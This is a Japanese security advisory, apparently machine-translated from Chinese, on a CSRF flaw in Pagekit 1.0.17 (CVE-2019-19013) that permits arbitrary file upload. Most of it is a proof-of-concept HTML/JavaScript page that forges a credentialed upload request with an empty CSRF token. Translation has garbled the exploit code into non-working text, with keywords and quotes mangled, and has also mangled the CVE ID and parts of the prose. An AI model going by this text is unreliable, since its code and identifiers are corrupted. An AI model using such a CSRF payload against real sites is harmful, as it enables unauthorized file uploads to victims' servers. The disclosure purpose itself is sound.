Pagekit CSRFの脆弱性(CVE-2019から19013)

Pagekit CSRFの脆弱性(CVE-2019から19013)


発売日: 2019年11月21日の
更新: 2019年11月26日

影響を受けるシステム:

Pagekit Pagekit 1.0.17

説明:


CVE(CAN)ID:CVE-2019から19013

Pagekitは、モジュラー、軽量なコンテンツ管理システムです。

Pagekit 1.0.17バージョン、実装でCSRFの脆弱性があります。CSRFリクエストからタグを除去することにより、攻撃者は任意のファイルをアップロードするには、この脆弱性を悪用することができます。

<*出典:ベンダー
  *>

試験方法:


警告

以下の手順(方法)が唯一の安全研究と教育の目的のために、攻撃運ぶことができます。ユーザー自身のリスク!

ベンダー()提供了如下测试方法:

<HTML>

  <BODY>

  <SCRIPT> history.pushState( ''、 ''、 '/')</ SCRIPT>

    <SCRIPT>

      関数submitRequest()

      {

        XHR =新しいXMLHttpRequestのVAR( );

        xhr.open( "POST"、 "のhttp:\ / \ / localhostの\ / pagekit \ /システム\ /ファインダー\ /アップロード"、真の);

        xhr.setRequestHeader( "Content-Typeの"、 "マルチパート\ /フォームデータ;境界= ---- WebKitFormBoundaryJze564AoGkbRRRUz");

        xhr.setRequestHeader( "* \ / *"、 "受け入れ");

        xhr.setRequestHeader( "EN-US、EN; Q = 0.9" "言語を受け入れます");

        xhr.withCredentials =はtrue。

        VAR本体= "

          "コンテンツの廃棄:フォームデータ、名前= \"ファイル[] \ ";ファイル名= \" test.jpg \ "\ R \ n" +

          "コンテンツタイプ:image / jpegの\ R \ n" +

          「\ R \ n "+

          "\ R \ n" +

          "------ WebKitFormBoundaryJze564AoGkbRRRUz \ R \ n" +

          "コンテンツの廃棄:フォームデータ、名前= \"パス\ "\ R \ n" +

          " \ R \ n "+

          "/ \ R \ n" +

          "------ WebKitFormBoundaryJze564AoGkbRRRUz \ R \ n" +

          "コンテンツの廃棄:フォームデータ、名前= \"ルート\ "\ R \ n" +

          " \ R \ n」+

          "ストレージ\ R \ n" +

          "------ WebKitFormBoundaryJze564AoGkbRRRUz \ R \ n"は+

          "コンテンツの廃棄:フォームデータ、名前= \" _ CSRF \ "\ R \ n" +

          "\ R \ n" +

          "\ R \ n" +

          "------ WebKitFormBoundaryJze564AoGkbRRRUz - \ rを\ n"は、

        VAR aBody =新しいUint8Array(body.length)。

        ため(VAR iが= 0; I <aBody.length; I ++)

          aBody [I] = body.charCodeAt(I)。

        xhr.send(新たなBLOB([aBody]))。

      }

      submitRequest()。

    </ SCRIPT>

    <フォームアクション= "#">

      の<input type = "ボタン"値= "要求を送信"のonclick = "submitRequest();" />

    </ FORM>

  </ BODY>

</ HTML>

建议:


メーカーパッチ:

Pagekit
-------
:現在、ベンダーがパッチやアップグレードを提供していない、我々はあなたが最新バージョン取得するために、ベンダのホーム・ページを懸念、いつでもこのソフトウェアを使用することをお勧めします

https://pagekit.com/

HTTPSを:// packetstormsecurity.com/files/155426/Pagekit-CMS-1.0.17-Cross-Site-Request-Forgery.html

おすすめ

転載: www.linuxidc.com/Linux/2019-11/161573.htm